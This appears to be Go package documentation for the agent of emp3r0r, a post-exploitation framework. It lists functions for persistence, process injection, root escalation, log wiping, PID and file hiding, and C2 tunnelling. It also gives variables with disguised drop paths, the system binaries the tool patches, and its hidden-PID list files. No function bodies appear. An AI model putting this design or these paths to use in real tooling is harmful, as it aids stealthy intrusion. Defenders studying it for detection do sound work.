- Variables
- func AddCronJob(job string) error
- func AddNeededLib(elf_file, lib_file string) (err error)
- func ApplyRuntimeConfig() (err error)
- func BroadcastMsg(msg, dst string) (err error)
- func BroadcastServer(ctx context.Context, cancel context.CancelFunc, port string) (err error)
- func C2CommandsHandler(cmdSlice []string) (out string)
- func CCMsgTun(ctx context.Context, cancel context.CancelFunc) (err error)
- func CheckAccount(username string) (accountInfo map[string]string, err error)
- func CheckAgentProcess() *emp3r0r_data.AgentProcess
- func CheckContainer() string
- func CheckIn() (err error)
- func CleanAllByKeyword(keyword string) (err error)
- func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo
- func ConnectCC(url string) (conn *h2conn.Conn, ctx context.Context, cancel context.CancelFunc, err error)
- func CopyProcExeTo(pid int, dest_path string) (err error)
- func CopySelfTo(dest_file string) (err error)
- func DownloadViaCC(file_to_download, path string) (data []byte, err error)
- func ExtractBash() error
- func FixELF(elf_path string) (err error)
- func GDBInjectLoader(pid int) error
- func GDBInjectSharedLib(pid int) error
- func GetKernelVersion() (uname string)
- func GetLibc(pid int) (path string, addr, offset int64, err error)
- func GetRoot() error
- func GetSymFromLibc(pid int, sym string) (addr int64, err error)
- func HasRoot() bool
- func HidePIDs() (err error)
- func InjectLoader(pid int) error
- func InjectSharedLib(so_path string, pid int) (err error)
- func InjectorHandler(pid int, method string) (err error)
- func IsAgentAlive(c net.Conn) bool
- func IsAgentRunningPID() (bool, int)
- func IsCCOnline(proxy string) bool
- func IsELF(file string) bool
- func IsStaticELF(file_path string) bool
- func KCPClient()
- func PersistAllInOne() (final_err error)
- func PortFwd(addr, sessionID, protocol string, reverse bool, timeout int) (err error)
- func ProcUID(pid int) string
- func RunShellScript(scriptBytes []byte) (output string, err error)
- func SSHD(shell, port string, args []string) (err error)
- func Screenshot() (path string, err error)
- func Send2CC(data *emp3r0r_data.MsgTunData) error
- func SetPath()
- func SetProcessName(name string)
- func SftpHandler(sess ssh.Session)
- func ShadowsocksC2Client()
- func ShellcodeInjector(shellcode *string, pid int) error
- func Socks5Proxy(op string, addr string) (err error)
- func StartBroadcast(start_socks5 bool, ctx context.Context, cancel context.CancelFunc)
- func Upgrade(checksum string) (out string)
- func VaccineHandler() (out string)
- type OSInfo
- type PortFwdSession
Constants ¶
This section is empty.
Variables ¶
var (
	// PersistMethods maps a method name to the function that applies it.
	// CC calls one of these methods to get persistence, or all of them at once;
	// look at emp3r0r_data.PersistMethods too.
	PersistMethods = map[string]func() error{
		"profiles": profiles,
		"cron":     cronJob,
		"patcher":  patcher,
	}

	// Hidden_PIDs and Hidden_Files are the list files of hidden pids/files
	// (see loader.c). Their presence is a host-level indicator worth monitoring.
	Hidden_PIDs  = "/usr/share/at/batch-job.at"
	Hidden_Files = "/usr/share/at/daily-job.at"

	// Patched_List enumerates the system utilities that the patcher replaces;
	// file-integrity checks on these paths would surface the modification.
	Patched_List = []string{
		"/usr/bin/ls",
		"/usr/bin/dir",
		"/usr/bin/ps",
		"/usr/bin/pstree",
		"/usr/bin/netstat",
		"/usr/sbin/sshd",
		"/usr/bin/bash",
		"/usr/bin/sh",
		"/usr/bin/ss",
	}

	// EmpLocations lists every location the agent may be dropped at when
	// running as root.
	EmpLocations = []string{
		"/env",
		"/usr/bin/x",
		"/usr/bin/.env",
		"/usr/local/bin/env",
		"/bin/.env",
		"/usr/share/man/man1/arch.gz",
		"/usr/share/man/man1/ls.1.gz",
		"/usr/share/man/man1/arch.5.gz",
	}

	// EmpLocationsNoRoot lists the unprivileged drop locations; the $HOME
	// entries are resolved once at package init from the HOME environment
	// variable (an empty HOME yields paths rooted at "/").
	EmpLocationsNoRoot = []string{
		"/tmp/.env",
		"/dev/shm/.env",
		fmt.Sprint(os.Getenv("HOME"), "/.wget-hst"),
		fmt.Sprint(os.Getenv("HOME"), "/.less-hist"),
		fmt.Sprint(os.Getenv("HOME"), "/.sudo_as_admin_successful"),
		fmt.Sprint(os.Getenv("HOME"), "/.env"),
		fmt.Sprint(os.Getenv("HOME"), "/.pam"),
	}
)
HandShakes records each hello message and the C2's reply
var (
	// PortFwds holds the active port mappings keyed by session id.
	PortFwds = map[string]*PortFwdSession{}

	// PortFwdsMutex guards PortFwds; hold it for every read and write of the map.
	PortFwdsMutex = new(sync.Mutex)
)
// ReverseConns records ssh reverse proxy sessions, keyed by session id, so
// that a session can be torn down by calling its CancelFunc.
var ReverseConns = map[string]context.CancelFunc{}
ReverseConns records ssh reverse proxy sessions
// RuntimeConfig is the agent's runtime configuration; it starts as the zero
// value and is presumably populated by ApplyRuntimeConfig — confirm there.
var RuntimeConfig = new(emp3r0r_data.Config)
// SS_Ctx and SS_Cancel form a package-wide context; NOTE(review): the SS_
// prefix suggests it bounds the Shadowsocks client (see ShadowsocksC2Client) —
// confirm against the caller.
var SS_Ctx, SS_Cancel = context.WithCancel(context.Background())
Functions ¶
func AddCronJob ¶
AddCronJob adds a cron job without a terminal; the job is created for whichever user runs the function
func AddNeededLib ¶
AddNeededLib adds a needed library to an ELF file; lib_file needs to be a full path
func ApplyRuntimeConfig ¶
func ApplyRuntimeConfig() (err error)
func BroadcastMsg ¶
BroadcastMsg sends a broadcast message on a network
func BroadcastServer ¶
BroadcastServer listens on a UDP port for broadcasts, waiting for other agents to announce their internet proxy
func C2CommandsHandler ¶
func CCMsgTun ¶
func CCMsgTun(ctx context.Context, cancel context.CancelFunc) (err error)
CCMsgTun uses the connection (CCConn)
func CheckAccount ¶
CheckAccount checks account info by parsing /etc/passwd
func CheckAgentProcess ¶
func CheckAgentProcess() *emp3r0r_data.AgentProcess
CheckAgentProcess fills in info.emp3r0r_data.AgentProcess
func CheckContainer ¶
func CheckContainer() string
func CleanAllByKeyword ¶
CleanAllByKeyword deletes any entries containing keyword in ALL known log files
func CollectSystemInfo ¶
func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo
CollectSystemInfo builds the system info object
func ConnectCC ¶
func ConnectCC(url string) (conn *h2conn.Conn, ctx context.Context, cancel context.CancelFunc, err error)
ConnectCC connects to CC with h2conn
func CopyProcExeTo ¶
CopyProcExeTo copies the executable of a process to dest_path
func CopySelfTo ¶
CopySelfTo copies the current executable to dest_file
func DownloadViaCC ¶
DownloadViaCC downloads via EmpHTTPClient; if path is empty, the downloaded bytes are returned in data instead
func ExtractBash ¶
func ExtractBash() error
ExtractBash extracts the embedded bash binary and configures our bash shell
func GetKernelVersion ¶
func GetKernelVersion() (uname string)
func GetLibc ¶
GetLibc gets the base address, ASLR offset value, and path of libc by parsing /proc/pid/maps
func GetSymFromLibc ¶
GetSymFromLibc gets a pointer to a libc function that is currently loaded in the target process, ASLR-proof
func InjectLoader ¶
InjectLoader inject loader.so into any process, using shellcode locate __libc_dlopen_mode in memory then use it to load SO
func InjectSharedLib ¶
InjectSharedLib injects a shared library into the target process
func InjectorHandler ¶
InjectorHandler handles `injector` module
func IsAgentAlive ¶
IsAgentAlive reports whether the agent is alive: it connects to emp3r0r_data.SocketName, sends a message, and checks whether a reply arrives
func IsAgentRunningPID ¶
IsAgentRunningPID reports whether an emp3r0r agent is already running, and its PID
func IsStaticELF ¶
func PersistAllInOne ¶
func PersistAllInOne() (final_err error)
PersistAllInOne runs all persistence methods at once
func PortFwd ¶
PortFwd sets up a port mapping: it receives request data, then sends it to the target port on remote address addr; when reverse is set, addr should be a port
func RunShellScript ¶
RunShellScript runs a bash script on target
func Screenshot ¶
Screenshot takes a screenshot and returns the path of the saved image
func SetPath ¶
func SetPath()
SetPath reads the current PATH variable, appends common paths to it, then removes duplicates
func SetProcessName ¶
func SetProcessName(name string)
SetProcessName renames the agent process by modifying its argv; all command-line arguments are dropped
func ShadowsocksC2Client ¶
func ShadowsocksC2Client()
ShadowsocksC2Client starts the Shadowsocks client, giving you a SOCKS5 proxy server at *:Runtime.ShadowsocksPort. This proxy server is responsible for encapsulating C2 traffic
func ShellcodeInjector ¶
ShellcodeInjector injects shellcode into an arbitrary running process; the target process is restored after the shellcode has done its job
func Socks5Proxy ¶
Socks5Proxy runs a SOCKS5 proxy server on the agent, listening on addr; op is on/off
func StartBroadcast ¶
func StartBroadcast(start_socks5 bool, ctx context.Context, cancel context.CancelFunc)
func VaccineHandler ¶
func VaccineHandler() (out string)
Types ¶
type OSInfo ¶
// OSInfo describes the host operating system. Every field is omitted from
// JSON output when empty (omitempty), so consumers must tolerate missing keys.
type OSInfo struct {
	Name         string `json:"name,omitempty"`         // OS name
	Vendor       string `json:"vendor,omitempty"`       // OS vendor / distribution
	Version      string `json:"version,omitempty"`      // OS version string
	Release      string `json:"release,omitempty"`      // OS release string
	Architecture string `json:"architecture,omitempty"` // CPU architecture
	Kernel       string `json:"kernel,omitempty"`       // kernel version
}
OSInfo holds operating system information.
type PortFwdSession ¶
// PortFwdSession holds the state of one port forwarding session; instances
// live in PortFwds and must be accessed under PortFwdsMutex.
type PortFwdSession struct {
	Addr string // is a listener when `reverse` is set, a dialer when used normally
	// Conn is the h2conn connection for this session — presumably to C2, as
	// returned by ConnectCC; confirm against the caller.
	Conn *h2conn.Conn
	// Ctx and Cancel bound the session's lifetime; Cancel tears it down.
	// NOTE(review): storing a context in a struct is discouraged in Go — the
	// session's lifetime should be reviewed if this is refactored.
	Ctx    context.Context
	Cancel context.CancelFunc
}
PortFwdSession manages a port forwarding session
Source Files ¶
- account.go
- account_linux.go
- bash.go
- broadcast.go
- c2cmds.go
- c2cmds_linux.go
- ccHandler.go
- config.go
- elf.go
- ftp.go
- getroot.go
- injector.go
- kcp.go
- mod.go
- osinfo.go
- osinfo_linux.go
- persistence.go
- poll.go
- proc.go
- proc_linux.go
- proxy.go
- run_script.go
- run_script_linux.go
- screenshot_linux.go
- set_path.go
- sftp.go
- shellcode.go
- shellcode_inject_amd64_linux.go
- shellhelpers.go
- ss.go
- ssh_harvester_amd64_linux.go
- sshd.go
- sshd_linux.go
- util.go
- vaccine.go
- virt.go
- virt_linux.go
- xtmp.go